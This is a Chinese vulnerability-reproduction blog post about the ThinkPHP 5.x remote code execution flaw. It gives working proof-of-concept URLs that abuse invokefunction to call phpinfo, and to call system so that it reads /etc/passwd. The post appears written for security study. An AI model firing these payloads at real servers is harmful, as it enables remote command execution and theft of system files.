专栏首页漏洞知识库Thinkphp5 5.0.22 / 5.1.29远程执行代码漏洞复现

Thinkphp5 5.0.22 / 5.1.29远程执行代码漏洞复现

漏洞知识库

网络安全/渗透测试/代码审计/

关注

ThinkPhp5.x远程代码执行漏洞复现

漏洞简介

2018年12月10日中午,thinkphp官方公众号发布了一个更新通知,包含了一个5.x系列所有版本存在被getshell的高风险漏洞。

漏洞原理

结合官方公告说的由于对控制器名没有足够的检测,再查看官方git commit信息

复现过程

通过phpinfo函数写出phpinfo()的信息

POC:

通过phpinfo函数写出phpinfo()的信息
index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

利用system函数远程命令执行

POC:

利用system函数远程命令执行读取/etc/passwd
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/etc/passwd

本文分享自微信公众号 - 漏洞知识库(HackedBug)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-10-26

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Discuz!X ≤3.4 任意文件删除漏洞复现

    Discuz!X社区软件,是一个采用PHP 和MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。

    漏洞知识库
  • Windows COM 特权提升漏洞Win7复现-CVE-2017-0213

    类型混淆的漏洞通常可以通过内存损坏的方式来进行利用.然而漏洞发现者在利用时,并未采用内存损坏的方式来进行漏洞利用。按照漏洞发现者的说法,内存损坏的利用方式需要对...

    漏洞知识库
  • MySQL手注之布尔型盲注详解

    基于布尔型SQL盲注即在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)。 这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。...

    漏洞知识库
  • 四种解决Nginx出现403 forbidden 报错的方法(转)

    我是在在本地用虚拟机中通过yum安装nginx的,安装一切正常,但是访问时报403,

    双面人
  • Android RxJava/RxAndroid结合Retrofit使用

    ? 概述 RxJava是一个在 Java VM 上使用可观测的序列来组成异步的、基于事件的程序的库。更重要的是:使用RxJava在代码逻辑上会非常简洁明了,尤...

    非著名程序员
  • golang mutex锁的竞争关系浅析

    刚才对golang的锁关系进行 一番思索,想着协程获取golang 对象锁的,是按先按时间先后顺序获取的,其实不然。下面请看代码,顺带写了2种读写锁的应用。

    地球流浪猫
  • C++构造函数语义(合成默认构造函数)

           在初学C++的时候,对于一个对象来说,如果我们没有去定义其默认构造函数,那么编译器就会为我们自动生成一个默认构造函数。但其实是不准确的,具体来说是...

    Ch_Zaqdt
  • emlog敏感信息泄漏漏洞

    漏洞复现:登录状态后访问http://xxx.xxx/admin/index.php?action=phpinfo

    周俊辉
  • 【Java多线程】写入同一文件,自定义线程池与线程回收利用 顶

    一个文件好几百兆,1个文件大概200万行左右的数据,现在我要解决的问题是,将 csv的数据读出来,组合数据,生成sql文件。

    linapex
  • 郭明錤预测苹果Mac 2021年弃用英特尔,推出首款基于ARM定制芯片产品

    今年4月份的时候,彭博社有一篇报道称,苹果将于2020年开始在自家Mac电脑上弃用英特尔提供的芯片,而采用自行研发生产的芯片。这篇报道中指出,这一计划在苹果公司...

    镁客网

扫码关注云+社区

领取腾讯云代金券